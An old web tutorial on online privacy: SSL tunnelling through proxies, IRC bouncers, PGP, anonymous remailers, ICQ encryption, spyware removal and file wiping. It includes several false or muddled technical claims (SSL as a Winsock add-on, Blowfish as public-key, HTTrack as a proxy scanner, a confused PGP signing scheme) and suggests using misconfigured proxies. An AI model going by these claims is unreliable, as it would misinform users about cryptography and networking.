SSL stands for Secure Socket Layer. The ?Secure? implies an encryption, while Socket Layer denotes an addition to the Window Socket system, Winsock. For those that don?t know, a Socket is an attachment to a port on a system. You can have many sockets on one port, providing they are non-blocking (allowing control to pass through to another socket aware application which wishes to connect to that port).
A Secure Socket Layer means that any sockets under it, are both secure and safe. The idea behind SSL was to provide an encrypted, and thus, secure route for traffic along a socket based system, such as TCP/IP (the internet protocol). Doing this allows security in credit card transactions on the Internet, encrypted and protected communiqué along a data line, and overall peace of mind.
The SSL uses an encryption standard developed by RSA. RSA are a world respected American organisation that specializes in encryption and data security. Initially, they developed a cipher length of only 40 bits, for use with the Secure Socket Layer, this was considered weak and therefore a longer much more complicated encryption cipher was created, 128 bits. The reasoning behind it was simple: it needs to be secure.
The RSA site puts the advantage of a longer encryption length pretty clearly: because 40-bit encryption is considered to be relatively weak. 128-bits is about 309 septillion times ( 309,485,000,000,000,000,000,000,000 ) larger than 40-bits. This would mean it would take that many times longer to crack or break 128-bit encryption than it would 40-bit.
If you want more information on the technicalities or RSA?s SSL encryption engine, visit their site: http://www.rsasecurity.com/standards/ssl.
But what does all this encryption and security have to do with you?
Well, that?s a simple question. No matter how hard you try, at times your privacy will need to be knowingly invaded so you can make use of the product offered for doing so. If you think about food, for example, one cannot eat without swallowing. When we wish to make a transaction or view a site on the internet, where we have to give enough information away so that it happens, we also want to be assured no one else along the line gathers that data. An encrypted session would mean our data is not at the hands of any privacy perpetrators unless they knew how to decode it ? and the only ones in the know, are those you specifically wish. SSL uses public key encryption as explained in the PGP section.
To put this at a head: if you use an encrypted connection or session, you can be relatively assured that there are no prying eyes along the way.
And how do I implement SSL with SSL Tunnelling?
We know that a Secure Socket Layer is safe, but what we don?t know is what a Tunnel is. In the most simplistic form, a tunnel is a proxy. Like proxy voting in general elections, a tunnel will relay your data back and forth for you. You may be aware though, that there are already ?proxies? out there, and yes, that is true. Tunnelling is done via proxies, but it is not considered to be the same as a standard proxy relaying simply because it isn?t.
Tunnelling is very special kind of proxy relay, in that it can, and does relay data without interfering. It does this transparently and without grievance or any care for what is passing its way.
Now, if we add this ability to ?tunnel? data, any data, in a pipe, to the Secure Sockets Layer, we have a closed connection that is independent of the software carrying it; and something that is also encrypted. For those of you wanting to know a little more about the technicalities, the SSL layer is also classless in the sense it does not interferer with the data passed back and forth ? after all, it is encrypted and impossible to tamper with. That attribute means an SSL capable proxy is able to transfer data out of its ?proxied? connection to the destination required.
So to sum up, we have both a secure connection that does the job and relays things in the right direction; and we have direct tunnel that doesn?t care what we pass through it. Two very useful, and almost blind entities. All we need now is a secure proxy that we can use as the tunnel.
Proxies:
Secure proxies are alike standard proxies. We can either use an HTTP base SSL equipped proxy - one specifically designed for security HTTP traffic, but because of the ignorant nature of SSL communication, it can be bent to any needs ? or we can use a proper SSL service designed for our connection ? like you would use a secure NNTP (news) program with a secure proxy on port 563 instead of taking our long way - which would probably work as well.
A secure HTTP proxy operates on port 443. Host proxies are not public, that means they operate for, and allow only traffic from their subnet or the ISP that operates them ? but, there are many badly configured HTTP proxies and some public ones out there. The use of a program called HTTrack (available on Neworder) will aid you in scanning and searching for proxies on your network or anywhere on the Internet if your ISP does not provide you with one.
Neworder also features a number of sites dedicated to listing public proxies in the Anonymity section. While it?s often hard to find a suitable fast proxy, it?s worth the effort when you get one.
So how can I secure my connections with SSL Tunnelling?
That?s a big question, and beyond the scope out this tuition as it must come to and end. I can however, point you in the right direction of two resources that will aid you in tunnelling both IRC, and most other connections via a HTTP proxy.
For Windows, the first stop would be http://www.totalrc.net?s Socks2HTTP. This is an SSL tunnelling program that turns a normal socks proxy connection into a tunnelled SSL connection.
The second stop, for both Windows and Unix is stunnel. Stunnel is a GNU kit developed for SSL tunnelling any connection. It is available for compile and download as binary here: Stunnel homepage - http://mike.daewoo.com.pl/computer/stunnel

[ anonymity on irc ]
A BNC, or a Bouncer - is used in conjunction with IRC as a way of hiding your host when people /whois you. On most IRC networks, your host isnt masked when you whois, meaning the entire IP appears, like 194.2.0.21, which can be resolved. On other networks, your host might be masked, like IRCnetwork-0.1 but it can still give valuable information, like nationality if your host is not a IP, but a DNS resolved host, like my.host.cn would be masked to IRCnetwork-host.cn but this would still tell the person who whoised you, that you are from China.
To keep information such as this hidden from the other users on an IRC network, many people use a Bouncer, which is actually just a Proxy. Let us first draw a schematic of how a normal connection would look, with and without a BNC installed.
Without a BNC:
your.host.cn <<-->> irc.box.sk
With a BNC:
your.host.cn <<-->> my.shell.com <<-->> irc.box.sk
You will notice the difference between the two. When you have a BNC installed, a shell functions as a link between you and the IRC server (irc.box.sk as an example). You install a BNC on a shell, and set a port for it to listen for connections on. You then login to the shell with your IRC client, BitchX/Xchat/mIRC, and then it will login to the IRC server you specify - irc.box.sk in this case. In affect, this changes your host, in that it is my.shell.com that makes all the requests to irc.box.sk, and irc.box.sk doesn't know of your.host.cn, it has never even made contact with it.
In that way, depending on what host your shell has, you can login to IRC with a host like i.rule.com, these vhosts are then actually just an alias for your own machine, your.host.cn, and it is all completely transparent to the IRC server.
Many servers have sock bots that check for socket connections. These aren't BNC connections, and BNC cannot be tested using a simple bot, unless your shell has a socket port open (normally 1080) it will let you in with no problem at all, the shell is not acting as a proxy like you would expect, but more as a simple IRC proxy, or an IRC router. In one way, the BNC just changes the packet and sends it on, like:
to: my.shell.com -> to: irc.box.sk -> to: my.shell.com from: your.host.cn <- from: my.shell.com <- from: irc.box.sk
The BNC simply swaps the host of your packet, saying it comes from my.shell.com. But also be aware, that your own machine is perfectly aware that it has a connection established with my.shell.com, and that YOU know that you are connected to irc.box.sk. Some BNCs are used in IRC networks, to simulate one host. If you had a global IRC network, all linked together, you could have a local server called: cn.myircnetwork.com which Chinese users would log into. It would then Bounce them to the actual network server, in effect making all users from china have the same host - cn.myircnetwork.com, masking their hosts. Of course, you could change the host too - so it didn't reveal the nationality, but it is a nice gesture of some networks, that they mask all hosts from everyone, but it makes life hard for IRCops on the network - but its a small price to pay for privacy.
Note: Even if you do use IRC bouncer, within DCC transfers or chat, your IP will be revealed, because DCC requires direct IP to IP connection. Usual mistake of IRC user is to have DCC auto-reply turned on. For an attacker is then easy to DCC chat you or offer you a file, and when IRC clients are connected, he can find out your IP address in the list of his TCP/IP connections (netstat).
How do I get IRC bouncer?
you download and install bouncer software, or get someone to install it for you (probably the most known and best bouncer available is BNC, homepage : http://gotbnc.com/)
you configure and start the software - in case it's bouncer at Unix machine, you start it on your shell account (let's say shell.somewhere.com)
you open IRC and connect to the bouncer at shell.somewhere.com on the port you told it to start on.
all depending on the setup, you may have to tell it your password and tell it where to connect, and you're now on irc as shell.somewhere.com instead of your regular hostname
[ mail crypto ]
Usually the safest way to ensure that your e-mail won't be read by unauthorised persons is to encrypt them. To be compatible with the rest of the world I'd suggest to use free PGP software.
PGP (Pretty Good Privacy) is a piece of software, used to ensure that a message/file has not been changed, has not been read, and comes from the person you think it comes from. Download location: http://www.pgpi.org/
How does pgp Work?
The whole idea behind PGP is that of Public and Private keys. To explain the algorithm PGP uses in order to encrypt the message would take too much time, and is beyond the scope of this, we will however look at how it ensures the integrity of the document. A user has a password, this password has to be chosen correctly, so don't choose passwords like "pop" or "iloveyou", this will make an attack more likely to succeed. The password is used to create a private key, and a public key - the algorithm ensures that you can not use the public key to make the private key. The public key is sent to a server, or to the people you send e-mails/files, and you keep the private key secret.
We will use a few terms and people in this introduction, they are: Pk - Public Key, Sk - Secret Key (private key). Adam will send an e-mail to Eve, and Rita will be a person in between, who we are trying to hide the content of the mail from. Rita will intercept the email (PGP doesn't ensure that Rita cant get her hands on the package, she can - its not a secure line like other technologies) and try to read it/modify it. Adam has a Sk1 and a Pk1, and Eve has a Sk2 and a Pk2. Both Adam, Eve, and Rita have Pk1 and Pk2, but Sk1 and Sk2 are presumed to be totally secret. First, here is a schematic of how it all looks:
PUBLIC SERVER
Pk1, Pk2

Adam <------------------------------------------> Eve Sk1 ^ Sk2
|
|
|
|
Rita
So Adam wants to send a packet to Eve, without Rite reading it, or editing it. There are three things that we need to make sure:
That Rita cant read the text without permission
That Rita cant edit it in any way, without Eve and Adam knowing
That Even knows that Adam sent it
First thing is making sure Rita cant read the text. Adam does this by encrypting the message with Eves Pk2 which he has found on the server. You can only Encrypt with the Pk, not decrypt, so Rita wont be able to read the data unless Eve has revealed her Sk2.
The second thing to make sure, is that Rite cant edit the message. Adam creates a hash from the message he has created. The hash can be encrypted using Pk2, or sent as it is. When Eve gets the message, she decrypts it, and creates a hash herself, then checks if the hashes are the same - if they are, the message is the same, if its different, something has changed in the message. The Hash is very secure, and it is in theory impossible to make a change, and get the hash to remain the same.
The third, and probably one of the most important things to ensure, is that Rita hasn't grabbed the mail, made a new one, and sent it in Adams name. We can ensure this by using Public key and Private key too. The Sk can be used both to encrypt and to decrypt, but Pk can only encrypt. When Adam normally sends a message M to Eve, he creates the encrypted message C by doing: C=Pk2(M). This means, Adam uses Pk2 (Eves Pk) on message M to create message C. Image this: Adam can encrypt the message with his Sk1, because it is impossible to derive Sk1 from the message, this is secure and without any danger, as long as no one knows the password used to make Sk1 with. If the message M is encrypted with Sk1, he gets a message called X, Eve can decrypt the message using Pk1 which is public. If the message decrypts to something that makes sence, then it must be from Adam, because Sk1 is considered as secret, and only Adam knows it.
The entire process looks like this, when sending message C: Adam signs his digital signature on C, and hashes C: X=Sk1(C). Then Adam encrypts the message for Eve: M=Pk2(X). The message is sent, and looks all in all like this: M=Pk2(Sk1(C)). Rita can intercept M, but not decrypt, edit, or resend it. Eve receives M, and decrypts it: X=Sk2(M). Then she checks the digital signature: C=Pk1(X) and checks the Hash on the way.
This way, the PGP Public/Private key system ensures integrity and security of the document e-mail, but PGP is not the only algorithm that uses the Public/Private key theory, Blowfish, and RSA are among the many other technologies that use it, PGP is just the most popular for e-mail encryption, but many don't trust it because of rumors of backdoors by the NSA (I don't know if its true though). PGP comes in a commercial, and a freeware version for Windows, and is available for Linux as well. What ever encryption you use, it will be better than none.

[ anonymous remailers ]
Remailers are programs accessible on the Internet that route email and USENET postings anonymously (i.e., the recipient cannot determine who sent the email or posted the article). This way the sender can't be traced back by routing headers included in the e-mail. There are different classes of remailers, which allow anonymous exchange of email and anonymous posting to USENET and often many other useful features.
Resources:
Chain is a menu-driven remailer-chaining script:
http://www.obscura.com/crypto.html
Raph Levien's remailer availability page offers comprehensive information about the subject
http://www.sendfakemail.com/~raph/remailer-list.html
The Cypherpunks Remailers are being developed to provide a secure means of providing anonymity on the nets. Here you can find out about the available remailers, those which have been standard in existance for a long time as well as the new experimental remailers and anonymous servers.
http://www.csua.berkeley.edu/cypherpunks/remailer/

[ icq privacy ]
How can I keep my privacy at ICQ?
Send and receive messages via ICQ server, not directly. Every direct connection enables attacker to learn your IP. Encrypt your messages by dedicated software, encryption addons.
How to encrypt ICQ messages?
There are addons which enhance your ICQ with possibility to encrypt outcoming messages. The user on the other side needs to have the addon as well in order to decrypt your message.
Resources:
http://www.encrsoft.com/products/tsm.html
Top Secret Messenger (TSM) - trial version has only weak 8-bit encryption
http://www.planet-express.com/sven/technical/dev/chatbuddy/default.html
Chat Buddy - a freeware Windows application for encrypting chat sessions
http://www.algonet.se/~henisak/icq/encrypt-v5.txt
how encryption works in ICQ protocol v5

[ spyware ]
As we all work hard to become more savvy about protecting our personal information and keeping as anonymous as possible on the web, advertising companies are working just as hard to come up with new ways of getting our personal information. One of the ways they accomplish this is through spyware.
Spyware are applications that are bundled along with many programs that you download for free. Their function is to gather personal information about you and relay it back to advertising firms. The information is then used either to offer you products or sold to other advertisers, so they can promote THEIR products. They claim this is all they do with this information, but the problem is nobody really knows for sure.
Spyware fits the classic definition of a trojan, as it is something that you did not bargain for+when you agreed to download the product. Not only is spyware an invasion of your privacy, but (especially if you have a few different kinds on your machine) it can also chew up bandwidth, making your internet connection slower.
Sometimes, these spies really are harmless, merely connecting back to the home server to deliver+you more advertising. Some, like Gator for instance, send out detailed information about your surfing habits, operating system, income, age demographic et cetera.
Avoiding spyware
Avoiding spyware is getting harder and harder, as more software distributors are choosing it as a method of profiting from freeware and shareware distributions. Be leery of programs with cute+little icons like Gator. Also, watch those Napster wannabes like AudioGalaxy, Limewire, and Kazaa. I've yet to find one that didn't include spyware. Before you download, check to see if the program is known to contain spyware.
For a list of most known spyware, the best I've found is here:
http://www.infoforce.qc.ca/spyware/enknownlistfrm.html
Getting rid of spyware
In most cases, you can remove the spyware from your system and still use the application you downloaded. In the case of Gator and Comet Cursor, the the whole program is spyware an it must be completely removed to stop the spying.
There are several ways to get rid of spyware on your system. You can use a firewall to monitor outgoing connections. The programmers that put these things together, however, are getting sneakier and sneakier about getting them to circumvent firewalls. Comet Cursor, for instance uses an HTTP post command to connect without the intervention of a firewall. You can also install a registry monitor such as Regmon to monitor your registry for unwanted registry registry changes, but this is not foolproof either.
Probably the best method of removal is to download a spyware removal program and run it like it was a virus scanner. The best examples of these programs are:
Lavasoft's Adaware. Available at http://www.lavasoftusa.com/ Or professional cybernut Steve Gibson's OptOut. Available at: http://grc.com/optout.htm Both of these programs are free and are updated regularly.
Here are some links, if you wish to learn more about spyware:
http://www.spychecker.com/
http://grc.com/optout.htm
http://www.thebee.com/bweb/iinfo200.htm

[ cleaning tracks ]
Resources:
Burnt Cookies - allows automatic detection and optional deletion of Cookies deposited by Banner Ad web-sites
http://www.andersson-design.com/bcookies/index.shtml
Surfsecret - automatically kills files like your Internet cache files, cookies, history, temporary files, recent documents, and the contents of the Recycle Bin.
http://www.surfsecret.com/
Note: One sidenote on cleaning tracks. When you delete some files on your machine, these aren't actually deleted. Only the reference to their location in the hard drive is deleted, which makes the OS think that that location on the HD is free and ready to take things. Thus, there are ways to recover data even after you delete them.
There are however, several ways to _wipe_ this information. Programs that fill hard disk locations with zeros, then with 1s, on several passes are your best bet to make sure no document goes to the wrong hands. One of such programs is PGP. PHPi now comes with a utility that does this work, and you can even select the number of passes to wipe files. For *nix, there is also the "wipe" program. Use these when you feel you have data that needs secure cleaning.

You May Like to Read:

You May Like to Read:

Popular Posts